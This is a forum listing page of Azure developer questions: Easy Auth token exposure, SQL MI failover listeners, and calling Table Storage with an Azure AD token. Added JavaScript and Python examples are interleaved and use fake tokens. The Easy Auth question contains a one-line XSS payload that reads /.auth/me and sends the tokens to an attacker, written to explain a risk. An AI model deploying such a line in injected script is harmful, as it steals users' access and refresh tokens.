Latest Discussions
App Service Easy auth and disabling /.auth/me
I plan on using Easy Auth with an ASP.NET Core web application hosted on Azure App Service with the Linux flavor. From my understanding, Easy Auth adds a couple of endpoints to the app service:
/.auth/login/<provider>/callback
/.auth/logout
/.auth/me
Usually when I use OpenID Connect and OAuth 2.0 I always opt for the authorization code flow to avoid users having direct access to their tokens (id_token/access_token/refresh_token), as the backend is capable of handling this through cookies in the browser and tokens stored elsewhere, away from the user. I have enabled Easy Auth with the token store for my application and it works as expected. My question is mainly concerned with the /.auth/me endpoint. This endpoint exposes all the tokens, along with the claims of the user. If I enable scopes for offline_access then the refresh_token is also exposed here. From a security perspective this seems horrible, as a simple XSS attack could read the tokens and ship them off to an attacker's server:
fetch("/.auth/me").then(r => r.json()).then(sendToMaliciousServer)
My questions are:
1. Can I disable this endpoint in Easy Auth to avoid the security issue while still maintaining access to having a token store?
2. Is MSAL (or rather Microsoft.Identity.Web) dependent on this endpoint to be able to read out the access_token from the token store of Easy Auth before calling downstream services?
Dzeneralen, Apr 14, 2023, Copper Contributor. 50K Views, 0 likes, 2 Comments
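The exposure the question describes, as an added example (this is not code from the original post, nor an App Service feature): a constructed /.auth/me response in the token-store shape (an array of provider entries with access_token, id_token, refresh_token, expires_on and user_claims), a function that lists exactly what a page script obtains from it, and a hypothetical claims-only view that a backend would hand the browser instead so the tokens stay server-side, as in the authorization code flow the poster prefers. The sample payload, the fake (unsigned) token values and the claimsOnlyView design are assumptions for illustration; the post itself does not say whether /.auth/me can be disabled. Runs under Node.js (uses Buffer).

```javascript
// Added example, not from the original post or from App Service: what a script
// injected via XSS can read from /.auth/me, and what a claims-only view would
// give the browser instead. SAMPLE_AUTH_ME is CONSTRUCTED to mirror the token
// store response shape; every token value in it is fake.

const TOKEN_FIELDS = ["access_token", "id_token", "refresh_token"];

// Build an unsigned, fake JWT so the example runs offline. Real tokens are
// signed; the point is only that the payload is plain base64url JSON that any
// page script can decode without a key.
function b64url(str) {
  return Buffer.from(str, "utf8").toString("base64")
    .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}
function fakeJwt(payload) {
  return [b64url(JSON.stringify({ alg: "none", typ: "JWT" })),
          b64url(JSON.stringify(payload)), ""].join(".");
}
function decodeJwtPayload(jwt) {
  const part = jwt.split(".")[1].replace(/-/g, "+").replace(/_/g, "/");
  return JSON.parse(Buffer.from(part, "base64").toString("utf8"));
}

// Constructed /.auth/me response for a user signed in through the "aad" provider
// with offline_access requested, hence the refresh_token.
const SAMPLE_AUTH_ME = [{
  provider_name: "aad",
  user_id: "user@example.com",
  access_token: fakeJwt({ aud: "api://downstream", scp: "access_as_user", exp: 1681500000 }),
  id_token: fakeJwt({ aud: "client-id", preferred_username: "user@example.com" }),
  refresh_token: "constructed-refresh-token-value",
  expires_on: "2023-04-14T12:00:00.0000000Z",
  user_claims: [
    { typ: "name", val: "Example User" },
    { typ: "http://schemas.microsoft.com/identity/claims/objectidentifier",
      val: "00000000-0000-0000-0000-000000000000" }
  ]
}];

// What fetch("/.auth/me") hands an attacker's script: each token field that is
// present, per provider, plus the audience of the access token (readable
// because it is a JWT), i.e. which downstream API the stolen token works against.
function inventoryAuthMe(entries) {
  return entries.map(e => ({
    provider: e.provider_name,
    user: e.user_id,
    exposedTokens: TOKEN_FIELDS.filter(f => typeof e[f] === "string" && e[f].length > 0),
    accessTokenAudience: e.access_token ? decodeJwtPayload(e.access_token).aud : null,
    claimCount: Array.isArray(e.user_claims) ? e.user_claims.length : 0
  }));
}

// Hypothetical backend-for-frontend view (an assumption, NOT an App Service
// feature): a server-side endpoint that forwards only identity claims, so an
// XSS payload that reads it gets nothing replayable against a downstream API.
function claimsOnlyView(entries) {
  return entries.map(e => ({
    provider: e.provider_name,
    user: e.user_id,
    claims: Object.fromEntries((e.user_claims || []).map(c => [c.typ, c.val]))
  }));
}

// Review check: does anything the browser receives still carry a token field?
function leaksTokens(value) {
  if (Array.isArray(value)) return value.some(leaksTokens);
  if (value && typeof value === "object") {
    return Object.entries(value).some(([k, v]) => TOKEN_FIELDS.includes(k) || leaksTokens(v));
  }
  return false;
}

console.log(JSON.stringify(inventoryAuthMe(SAMPLE_AUTH_ME), null, 2));
console.log("raw /.auth/me leaks tokens:", leaksTokens(SAMPLE_AUTH_ME));
console.log("claims-only view leaks tokens:", leaksTokens(claimsOnlyView(SAMPLE_AUTH_ME)));
```

The inventory is the attacker's view; the claims-only view is what a page script would be allowed to see if tokens were kept server-side. Whether Microsoft.Identity.Web needs /.auth/me itself is the poster's open question and is not answered by this example.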
What is use of Read/write and Read-only listener endpoint in Failover Groups
Hi Team, Can someone help me to know the use of the Read/write and Read-only listener endpoints in Failover Groups in Azure SQL MI.
1. Can I use the name of the Read/write listener endpoint in the connection string for read/write, and
2. Can I use the name of the Read-only listener endpoint in the connection string for reporting purposes?
manishshukla05, Jan 20, 2021, Copper Contributor. 5.6K Views, 0 likes, 2 Comments
Azure Logic Apps vs Power Automate
Hello Experts, Please guide me in selecting the more suitable option between Azure Logic Apps and Power Automate for developing an enterprise application that operates on a scheduled basis. This application must interact with multiple on-premises and SaaS systems by making several REST API calls (approximately 8-10 calls) and storing the retrieved data (structured and unstructured). Thanks - Sri
DynamicsHulk, Dec 18, 2023, Copper Contributor. 5.2K Views, 0 likes, 3 Comments
Use Azure Storage Table REST API with AAD token via PostMan
You can refer to the steps below for scenarios in which your application has a special requirement and you need to call the raw Storage Table REST API from your dev environment via Postman. It consists of two main HTTP requests: first, authenticate directly using an AD security principal to get an access token; second, make an authenticated Storage REST API call for Table Storage.
Related documentation:
- Query Entities REST API - https://docs.microsoft.com/en-us/rest/api/storageservices/query-entities
- Authorize access to tables using Azure Active Directory - https://docs.microsoft.com/en-us/azure/storage/tables/authorize-access-azure-active-directory
Prerequisites
To follow the steps in this article you must have:
- An Azure subscription
- An Azure AD tenant
- A registered application (AD service principal)
Steps to reproduce this scenario:
Acquire the OAuth 2.0 token:
1. Create a security principal for the application (Azure portal > AAD > App registrations). Documentation reference: https://docs.microsoft.com/en-us/rest/api/servicebus/get-azure-active-directory-token#register-your-app-with-azure-ad
2. Assign the Storage Table Data Reader role at storage account level to the SP created in step #1 (wait for 30 mins).
3. Use Postman to get the Azure AD token:
- Launch Postman. For the method, select GET. For the URI, enter https://login.microsoftonline.com/<TENANT ID>/oauth2/token. Replace <TENANT ID> with the tenant ID value you copied earlier.
- On the Headers tab, add the Content-Type key with application/x-www-form-urlencoded as the value.
- Switch to the Body tab, select form-data, and add the following keys and values:
  grant_type: client_credentials
  client_id: the client ID you noted down earlier
  client_secret: the client secret you noted down earlier
  resource: https://storage.azure.com/
- Select Send to send the request to get the token. You see the token in the result. Save the token (excluding double quotes). You will use it later.
4. Call the Query Entities Storage REST API and pass the OAuth 2.0 token from the previous step:
- In Postman, open a new tab. Select GET for the method.
- Enter the URI in the following format: https://<account>.table.core.windows.net/<table>(). Replace <account> with the name of the storage account. Replace <table> with the name of the table.
- On the Headers tab, add the following three headers. Add the Authorization key with a value in the following format: Bearer <TOKEN from Azure AD>. When you copy/paste the token, don't copy the enclosing double quotes.
- Select Send to get the entities from the table. You see the status OK with code 200 as shown in the following image.
jumontoy, Aug 13, 2021, Former Employee. 5.1K Views, 0 likes, 0 Comments
- _HSK_, Oct 30, 2021, Copper Contributor. 3.7K Views, 0 likes, 2 Comments
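The same two-request flow as a script, added here as an example and not part of the original post. Two caveats in my own voice: the token request is sent as a POST, which is what the OAuth 2.0 token endpoint expects (the method named in the Postman steps above is the post's own), and the post says to add "three headers" but names only Authorization, so the x-ms-date and x-ms-version headers below, and the x-ms-version value, are my assumptions from the Table service REST reference, not the post's. Tenant, client, account and table names are placeholders; the transports are injected so the flow can be run offline against the constructed fake Azure AD and Table Storage responses at the bottom. A local check that the token's audience is the Storage resource is included because a token minted for the wrong resource is the usual cause of a 401 at step 4.

```python
"""Added example (not from the original post): client_credentials token from
Azure AD (v1 endpoint, as in the post), then Query Entities with a bearer token.
Placeholders and assumptions are marked in comments."""
import base64
import json
import urllib.request
from datetime import datetime, timezone
from email.utils import format_datetime
from urllib.parse import parse_qs, urlencode

STORAGE_RESOURCE = "https://storage.azure.com/"


def build_token_request(tenant_id, client_id, client_secret, resource=STORAGE_RESOURCE):
    """Azure AD v1 client_credentials request with the same fields the post uses in Postman."""
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/token"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    body = urlencode({"grant_type": "client_credentials", "client_id": client_id,
                      "client_secret": client_secret, "resource": resource}).encode()
    return url, headers, body


def extract_access_token(token_response_body):
    """The post says 'save the token excluding double quotes': read the JSON field instead."""
    doc = json.loads(token_response_body)
    if "access_token" not in doc:
        raise ValueError(f"no access_token in response: {doc.get('error_description', doc)}")
    return doc["access_token"]


def jwt_audience(token):
    """Decode the (unverified) JWT payload to check the token was issued for Storage.
    Signature verification is the resource server's job; this is only a local sanity check."""
    part = token.split(".")[1]
    part += "=" * (-len(part) % 4)
    return json.loads(base64.urlsafe_b64decode(part)).get("aud")


def build_query_entities_request(account, table, token, api_version="2020-12-06"):
    """GET https://<account>.table.core.windows.net/<table>() with a bearer token.
    x-ms-date / x-ms-version / Accept are my assumptions for the headers the post leaves
    unnamed; the api_version default is an assumption too."""
    url = f"https://{account}.table.core.windows.net/{table}()"
    headers = {"Authorization": f"Bearer {token}",
               "x-ms-date": format_datetime(datetime.now(timezone.utc), usegmt=True),
               "x-ms-version": api_version,
               "Accept": "application/json;odata=nometadata"}
    return url, headers


def query_entities(tenant_id, client_id, client_secret, account, table, post, get):
    """Full flow. post(url, headers, body) and get(url, headers) return (status, body_bytes)."""
    url, headers, body = build_token_request(tenant_id, client_id, client_secret)
    status, resp = post(url, headers, body)
    if status != 200:
        raise RuntimeError(f"token request failed: {status} {resp[:200]!r}")
    token = extract_access_token(resp)
    aud = jwt_audience(token)
    if aud not in (STORAGE_RESOURCE, STORAGE_RESOURCE.rstrip("/")):
        raise RuntimeError(f"token audience {aud!r} is not Storage; check the 'resource' value")
    url, headers = build_query_entities_request(account, table, token)
    status, resp = get(url, headers)
    if status == 403:  # the post's 'wait for 30 mins' after the role assignment
        raise RuntimeError("403: Storage Table Data Reader not assigned or not yet propagated")
    if status != 200:
        raise RuntimeError(f"query failed: {status} {resp[:200]!r}")
    return json.loads(resp)["value"]


def http_post(url, headers, body):
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req) as r:
        return r.status, r.read()


def http_get(url, headers):
    req = urllib.request.Request(url, headers=headers, method="GET")
    with urllib.request.urlopen(req) as r:
        return r.status, r.read()


def fake_jwt(payload):
    """Unsigned, constructed JWT for offline runs."""
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none'})}.{enc(payload)}."


def fake_transport():
    """Constructed stand-in for Azure AD and Table Storage; records what it was sent."""
    seen = {}

    def post(url, headers, body):
        seen["token_url"] = url
        seen["form"] = {k: v[0] for k, v in parse_qs(body.decode()).items()}
        tok = fake_jwt({"aud": STORAGE_RESOURCE, "appid": seen["form"].get("client_id")})
        return 200, json.dumps({"token_type": "Bearer", "access_token": tok}).encode()

    def get(url, headers):
        seen["query_url"], seen["query_headers"] = url, headers
        if not headers.get("Authorization", "").startswith("Bearer "):
            return 403, b"Forbidden"
        rows = [{"PartitionKey": "p1", "RowKey": "r1", "Name": "constructed"}]  # constructed data
        return 200, json.dumps({"value": rows}).encode()

    return post, get, seen


if __name__ == "__main__":
    post, get, _ = fake_transport()  # swap in http_post, http_get for a real run
    print(query_entities("<TENANT ID>", "<CLIENT ID>", "<SECRET>", "<account>", "<table>", post, get))
```

For a real run, pass http_post and http_get and the values from steps 1 to 3; everything else is unchanged.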
Azure Activity Log with no “Event Initiated by” value
I was working on Azure Public Cloud and found that there are some events in the Activity Log with no Caller value, as seen below. This is an example:
Operation name: Update SQL database
Time stamp: Sun Mar 07 2021 12:27:30 GMT+0700 (Indochina Time)
Event initiated by: -
The change that was made is earliestRestoreDate (Description: This records the earliest start date and time that restore is available for this database (ISO8601 format).)
I want to know who initiated this event and am wondering if this is a kind of system event. Can someone explain what this event is related to? Thank you!
2.9K Views, 0 likes, 0 Comments
Unable to setup Appservice to use custom domain purchased via Azure portal
I recently purchased a new custom domain to use with my App Service. I have done this before without any problems. I have tried to set this up via two methods:
1) Add a hostname binding within the Custom Domain blade. This fails with an error with no extra details.
2) Add a custom domain within the App Service blade. This fails on domain ownership and asks me to create a CNAME configuration record. I assume this is also why option 1) fails silently.
I have tried this by entering the Advanced Management Portal on the Custom Domain blade, but this does not give me access to add any DNS records; all I can do is edit the nameservers. Help!!!! This means I am left with a domain I purchased that I cannot use, and I can no longer buy this through an external provider so I can set it up externally from Azure.
NickUK, Jan 30, 2020, Copper Contributor. 2.9K Views, 0 likes, 1 Comment
Application Insights PHP SDK or Opentelemetry support
Hi everyone, We are using the Symfony framework, which is built on PHP. Our application is hosted on App Service and so far we have been using https://github.com/microsoft/ApplicationInsights-PHP, which is actually not maintained anymore. Over the last couple of months I have seen some updates regarding the use of OpenTelemetry to send data to Application Insights as an alternative to using an SDK for a given stack. Is there any update on when OpenTelemetry with PHP will be supported with Application Insights, if this is not the case yet? Any example of implementation people could share? Thank you in advance for your help on this! Valentin.
Valentin_Watel, Jun 15, 2023, Copper Contributor. 2.8K Views, 3 likes, 0 Comments
API Management Policy - Secure way to detect requests from Application Gateway
Hello. We have API Management which is reachable from the internal network, and from the external network (internet) via Application Gateway. I want to add an authorization policy in an API which only applies if requests are coming from the external network. Microsoft recommends NOT using the Host header because it can be modified by the user (https://learn.microsoft.com/en-us/azure/architecture/best-practices/host-name-preservation#context). Is there a secure way to check if requests are coming from the external network? Would "Context.Request.OriginalUrl.Host" work for this, or is the value a copy of the Host header? (https://learn.microsoft.com/en-us/azure/api-management/api-management-policy-expressions#ContextVariables)
sampa611, Oct 20, 2022, Copper Contributor. 2.7K Views, 0 likes, 3 Comments
Clean Architecture with DevSecOps
Hi Azure Developers and DevSecOps Enthusiasts, I would like to share my recent project hosted on GitHub. Clean Architecture with DevSecOps is a showcase project presenting DevSecOps best practices together with Clean Architecture patterns for building ASP.NET Core Web APIs hosted on the Microsoft Azure cloud. Clean Architecture with DevSecOps. I hope you will find it interesting.
2.7K Views, 0 likes, 0 Comments